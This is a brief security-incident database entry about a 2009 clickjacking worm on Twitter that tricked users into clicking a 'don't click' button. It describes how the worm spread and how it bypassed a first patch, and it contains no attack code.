WHID 2009-31: Double Clickjacking Worm on Twitter

Twitter is certainly bypassing Facebook as the most popular site out there, at least when it comes to security incidents.This time somebody decided abuse Twitter to demonstrate Clickjacking, an attack that RSname and Jeremiah Grossman re-christened in the OWASP conference in New York in September.

A well placed button labeled "don't click" make people click on it actually sending a Twitter message. Sunlight labs have a very interesting report showing the rate of propagation of the worm.

Cnet reports the worm spread on Feb 12^th in two pulses. After the Twitter people closed the loophole the 1st time, somebody bypassed the patch to restart the worm spread out.

Chriss Shiflett provides a very good technical analysis of the worm.